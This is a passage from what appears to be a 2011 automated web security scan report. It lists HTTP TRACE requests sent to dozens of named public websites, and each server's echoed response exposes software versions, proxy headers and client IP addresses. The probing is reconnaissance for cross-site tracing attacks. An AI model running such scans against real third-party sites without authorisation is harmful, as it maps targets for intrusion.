Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.findlocaljobsnow.com
Cookie: a553c0938697c719


21.95. http://www.flixster.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.flixster.com
Cookie: 1fccc171bb2ee032

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:51:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.flixster.com
Cookie: 1fccc171bb2ee032


21.96. http://www.forbes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forbes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.forbes.com
Cookie: 7f98ee1335dba7f5

Response

HTTP/1.0 200 OK
Server: Apache/1.3.26
Content-Type: message/http
Backend: www
Content-Length: 90
Date: Sat, 02 Apr 2011 13:31:04 GMT
X-Cache: MISS
Connection: close

TRACE / HTTP/1.0
Cookie: 7f98ee1335dba7f5
Host: www.forbes.com
X-Varnish: 137817313


21.97. http://www.forless.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forless.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.forless.com
Cookie: 6c246d1fc1df3552

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:02 GMT
Server: Apache/2.2.8 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.forless.com
Cookie: 6c246d1fc1df3552


21.98. http://www.formspring.me/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.formspring.me
Path:   /

Request

TRACE / HTTP/1.0
Host: www.formspring.me
Cookie: 2452ee73ca9df00

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:25:08 GMT
Server: Apache
Content-Length: 175
Connection: Close

TRACE / HTTP/1.1
host: www.formspring.me
Cookie: 2452ee73ca9df00
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive


21.99. http://www.freelogs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freelogs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.freelogs.com
Cookie: 519a3a4d5bdc104b

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sat, 02 Apr 2011 14:10:07 GMT
Server: Apache/2.2.16 (Amazon)
Content-Length: 175
Connection: Close

TRACE / HTTP/1.1
host: www.freelogs.com
Cookie: 519a3a4d5bdc104b
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive


21.100. http://www.freeonlinegames.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeonlinegames.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.freeonlinegames.com
Cookie: 6c4822f3e34d5bf3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:17 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.freeonlinegames.com
Cookie: 6c4822f3e34d5bf3


21.101. http://www.freeridegames.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeridegames.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.freeridegames.com
Cookie: 9f643e9b2bbcfeea

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:08 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.freeridegames.com
Cookie: 9f643e9b2bbcfeea


21.102. http://www.friendster.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.friendster.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.friendster.com
Cookie: 4a0383126b3c8711

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:21 GMT
Server: Apache/1.3.39 (Unix)
Connection: close
Content-Type: message/http
Via: CN-5000

TRACE / HTTP/1.0
Client-IP: 173.193.214.243
Connection: Keep-Alive
Cookie: 4a0383126b3c8711
Host: www.friendster.com
Via: CN-5000


21.103. http://www.froo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.froo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.froo.com
Cookie: f41d3b0b4846a77f

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sat, 02 Apr 2011 14:10:13 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 171
Connection: Close

TRACE / HTTP/1.1
host: www.froo.com
Cookie: f41d3b0b4846a77f
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive


21.104. http://www.funwebproducts.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funwebproducts.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.funwebproducts.com
Cookie: 8bb85e6a73fa4fb9

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:31 GMT
Server: Apache/1.3.27 (Unix) Resin/2.0.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 8bb85e6a73fa4fb9
Host: www.funwebproducts.com
X-Jabodo-For: 173.193.214.243


21.105. http://www.gamesradar.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamesradar.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gamesradar.com
Cookie: 77d6c9c7afc842b9

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:56 GMT
Server: Apache/2.2.11 (Ubuntu) mod_jk/1.2.26
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gamesradar.com
Cookie: 77d6c9c7afc842b9
X-Forwarded-For: 173.193.214.243


21.106. http://www.gamewinners.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamewinners.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gamewinners.com
Cookie: 3001fd731e048101

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:45:28 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
X-Cache: MISS from www.gamewinners.com
X-Cache-Lookup: NONE from www.gamewinners.com:80
Via: 1.0 www.gamewinners.com:80 (squid/2.6.STABLE16)
Connection: close

TRACE / HTTP/1.0
Host: www.gamewinners.com
Cookie: 3001fd731e048101
Via: 1.0 www.gamewinners.com:80 (squid/2.6.STABLE16)
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=259200


21.107. http://www.gardenweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gardenweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gardenweb.com
Cookie: 8bf9aca415cac5ed

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:51 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gardenweb.com
Cookie: 8bf9aca415cac5ed
X-Forwarded-For: 173.193.214.243


21.108. http://www.gather.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gather.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gather.com
Cookie: e6cec77c6f4e4b69

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:05 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gather.com
Cookie: e6cec77c6f4e4b69
Connection: Keep-Alive


21.109. http://www.gemoney.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gemoney.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gemoney.com
Cookie: 123bde3a68cd2967

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:31 GMT
Server: IBM_HTTP_Server
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: www.gemoney.com
Cookie: 123bde3a68cd2967
Connection: Keep-Alive
X-BlueCoat-Via: F97C647038B5099E


21.110. http://www.genealogy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genealogy.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.genealogy.com
Cookie: 3394cf95ba86fe79

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:39 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerwww.genealogy.com=85567680.20480.0000; path=/

TRACE / HTTP/1.0
Cookie: 3394cf95ba86fe79
Host: www.genealogy.com


21.111. http://www.gf2ube.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gf2ube.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gf2ube.com
Cookie: 8246c785b437c21b

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:44 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gf2ube.com
Cookie: 8246c785b437c21b


21.112. http://www.gifts.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gifts.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gifts.com
Cookie: b5be123881aa1681

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:31 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: SERVERID=web07; path=/
Cache-control: private

TRACE / HTTP/1.0
Host: www.gifts.com
Cookie: b5be123881aa1681
X-Forwarded-For: 173.193.214.243, 184.73.210.87


21.113. http://www.golikeus.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.golikeus.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.golikeus.net
Cookie: d3982d814d45dd8a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.golikeus.net
Cookie: d3982d814d45dd8a


21.114. http://www.gravity.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gravity.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gravity.com
Cookie: b73c060ba0c8921

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:12 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gravity.com
Cookie: b73c060ba0c8921
Connection: Keep-Alive


21.115. http://www.greatschools.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greatschools.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.greatschools.org
Cookie: bc1bb666ec50fda9

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) mod_perl/1.31 mod_ssl/2.8.31 OpenSSL/0.9.8e mod_jk/1.2.28
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:43:29 GMT
Connection: close

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: bc1bb666ec50fda9
Host: www.greatschools.org
X-Cluster-Client-Ip: 173.193.214.243


21.116. http://www.guardian.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /

Request

TRACE / HTTP/1.0
Host: www.guardian.co.uk
Cookie: e16c9a90184f1d6f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:59 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.guardian.co.uk
Cookie: e16c9a90184f1d6f


21.117. http://www.healthcare.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcare.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.healthcare.com
Cookie: bd38029a4238114a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:53 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_ssl/2.2.9 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.healthcare.com
Cookie: bd38029a4238114a


21.118. http://www.home-remedies-for-you.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.home-remedies-for-you.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.home-remedies-for-you.com
Cookie: 1fb92685445341ae

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:20:06 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.home-remedies-for-you.com
Cookie: 1fb92685445341ae


21.119. http://www.homegain.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homegain.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homegain.com
Cookie: 5f756bcd73b225c0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.homegain.com
Cookie: 5f756bcd73b225c0


21.120. http://www.homestead.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homestead.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homestead.com
Cookie: 8c33b98e90676f89

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:34:01 GMT
X-Powered-By: ASP.NET
Set-Cookie: BASEREFERER=referrerless; expires=Friday, 01-Jul-2011 13:34:02 GMT; path=/; domain=.homestead.com
Set-Cookie: SIGNUPEARCODE=REFERERLESS; expires=Friday, 01-Jul-2011 13:34:02 GMT; path=/; domain=.homestead.com
Set-Cookie: phsViewerID=173.193.214.243.1301751242.21672; expires=Sunday, 01-Apr-2012 13:34:02 GMT; path=/; domain=.homestead.com
Content-Type: message/http
Content-Length: 71

TRACE / HTTP/1.0
Host: www.homestead.com
Cookie: 8c33b98e90676f89


21.121. http://www.hotelguides.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelguides.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hotelguides.com
Cookie: 530d7d0f930c5521

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:29 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hotelguides.com
Cookie: 530d7d0f930c5521


21.122. http://www.iloveindia.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iloveindia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.iloveindia.com
Cookie: 279f752052bb65ce

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:58 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.iloveindia.com
Cookie: 279f752052bb65ce


21.123. http://www.imagevenue.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imagevenue.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.imagevenue.com
Cookie: 6989997241e97b2b

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:52 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.imagevenue.com
Cookie: 6989997241e97b2b


21.124. http://www.indeed.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indeed.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.indeed.com
Cookie: 66e10ca5eb618921

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:39 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: NSC_vt_jbe=ffffffffad2ce57445525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:24:39 GMT;path=/;httponly

TRACE / HTTP/1.0
Host: www.indeed.com
Cookie: 66e10ca5eb618921
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


21.125. http://www.infomash.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infomash.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.infomash.org
Cookie: 1e5ba26dacdc0e21

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:39 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.infomash.org
Cookie: 1e5ba26dacdc0e21


21.126. http://www.insiderpages.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insiderpages.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.insiderpages.com
Cookie: 69bca2a232ea2953

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:36 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.insiderpages.com
Cookie: 69bca2a232ea2953
X-Forwarded-For: 173.193.214.243


21.127. http://www.itt-tech.edu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itt-tech.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.itt-tech.edu
Cookie: 7bcdac377624134a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:29:07 GMT
Server: Apache/2.0.55 (Unix) JRun/4.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.itt-tech.edu
Cookie: 7bcdac377624134a


21.128. http://www.iwon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iwon.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.iwon.com
Cookie: 4e40f98aeafbc1a3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:47 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: ltm=2114148874.20480.0000; expires=Sat, 16-Apr-2011 13:31:46 GMT; path=/

TRACE / HTTP/1.0
Host: www.iwon.com
Cookie: 4e40f98aeafbc1a3
X-Jabodo-For: 173.193.214.243


21.129. http://www.jobsonline.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobsonline.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.jobsonline.net
Cookie: 860c031c585df21

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:45:41 GMT
Server: Apache/2.2.11 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.jobsonline.net
Cookie: 860c031c585df21
Connection: close
X-Forwarded-For: 173.193.214.243


21.130. http://www.jobsonlinemail.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobsonlinemail.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.jobsonlinemail.net
Cookie: 4c2a7d520fcfd9a1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:30 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.jobsonlinemail.net
Cookie: 4c2a7d520fcfd9a1


21.131. http://www.justia.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.justia.com
Cookie: ffc70b24ed9a29d1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:26 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.justia.com
Cookie: ffc70b24ed9a29d1


21.132. http://www.justluxe.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justluxe.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.justluxe.com
Cookie: 964f1d7fb78b3c20

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:48 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.justluxe.com
Cookie: 964f1d7fb78b3c20


21.133. http://www.kaboose.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaboose.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.kaboose.com
Cookie: aaf04dfaecbd3964

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:43 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9
Connection: close
Content-Type: message/http
X-UA-COMPATIBLE: IE=EmulateIE7

TRACE / HTTP/1.0
Host: www.kaboose.com
Cookie: aaf04dfaecbd3964
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


21.134. http://www.kazaa.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kazaa.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.kazaa.com
Cookie: 77e4d0625a0b52ac

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:52 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.kazaa.com
Cookie: 77e4d0625a0b52ac


21.135. http://www.kcom.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.kcom.com
Cookie: 52e1f19ff171648a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:58 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.kcom.com
Cookie: 52e1f19ff171648a


21.136. http://www.know-where.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.know-where.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.know-where.com
Cookie: 713d4231c291cbb6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:49 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.know-where.com
Cookie: 713d4231c291cbb6


21.137. http://www.letssingit.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.letssingit.com
Cookie: 76306020d61e273d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:02 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.letssingit.com
Cookie: 76306020d61e273d


21.138. http://www.lijit.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lijit.com
Cookie: 22b26168b268740c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:07 GMT
Server: PWS/1.7.1.5
X-Px: nc iad-agg-n6 ( origin>CONN)
Content-Length: 341
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: www.lijit.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n6.panthercdn.com PWS/1.7.1.5
X-Forwarded-For: 173.193.214.243, 66.114.52.16
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://www.lijit.com/
Cookie: 22b26168b268740c
Connection: keep-alive


21.139. http://www.likewut.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.likewut.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.likewut.net
Cookie: 5c6f3d09f545f641

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.likewut.net
Cookie: 5c6f3d09f545f641


21.140. http://www.liveleak.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.liveleak.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.liveleak.com
Cookie: 4117914d6c6c1016

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:09 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.8 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.liveleak.com
Cookie: 4117914d6c6c1016


21.141. http://www.livevideo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livevideo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.livevideo.com
Cookie: 84b26fbe89d312d6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:24 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.livevideo.com
Cookie: 84b26fbe89d312d6


21.142. http://www.localpages.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localpages.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.localpages.com
Cookie: 4ee4960f0ae509c2

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:21 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.localpages.com
Cookie: 4ee4960f0ae509c2


21.143. http://www.lowermybills.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowermybills.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lowermybills.com
Cookie: f2f272b9bfb104a5

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:59 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerpl.lmbprod=520364042.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.lowermybills.com
Cookie: f2f272b9bfb104a5


21.144. http://www.lowfares.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowfares.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lowfares.com
Cookie: b949a4bcbfd086b7

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:41 GMT
Server: Apache/2.0.52 (CentOS)
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: 127.0.0.1:50
Cookie: b949a4bcbfd086b7
X-Forwarded-For: 173.193.214.243, 204.13.160.62
Max-Forwards: 10
X-Forwarded-Host: www.lowfares.com
X-Forwarded-Server: lowfares.com


21.145. http://www.lyrics007.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyrics007.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lyrics007.com
Cookie: 3afd84334f9dcd37

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 18:16:49 GMT
Server: Apache/2.0.46 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lyrics007.com
Cookie: 3afd84334f9dcd37


21.146. http://www.lyricsmania.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyricsmania.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lyricsmania.com
Cookie: aba02a2c8ea7a5cd

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lyricsmania.com
Cookie: aba02a2c8ea7a5cd


21.147. http://www.macrumors.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macrumors.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.macrumors.com
Cookie: ab0a093f9157dff3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:37 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8b
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: ab0a093f9157dff3
Host: www.macrumors.com


21.148. http://www.made-in-china.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.made-in-china.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.made-in-china.com
Cookie: a758c821fa9b2947

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:08 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.made-in-china.com
Cookie: a758c821fa9b2947


21.149. http://www.mainstreet.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mainstreet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mainstreet.com
Cookie: 10d8b960120dc784

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:44 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mainstreet.com
Cookie: 10d8b960120dc784
X-Forwarded-For: 173.193.214.243


21.150. http://www.manualsonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manualsonline.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.manualsonline.com
Cookie: 232135f444a521e0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:46:13 GMT
Server: Apache/2.2.14 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.manualsonline.com
Cookie: 232135f444a521e0


21.151. http://www.mapsofworld.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapsofworld.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mapsofworld.com
Cookie: 674bb8472c974c6f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:32 GMT
